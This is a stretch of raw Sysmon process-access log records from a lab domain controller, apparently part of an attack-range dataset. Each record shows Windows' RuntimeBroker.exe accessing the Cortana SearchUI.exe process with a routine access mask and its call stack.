12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246004C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245348C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245348C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245360C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245356C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49245332C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.960{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 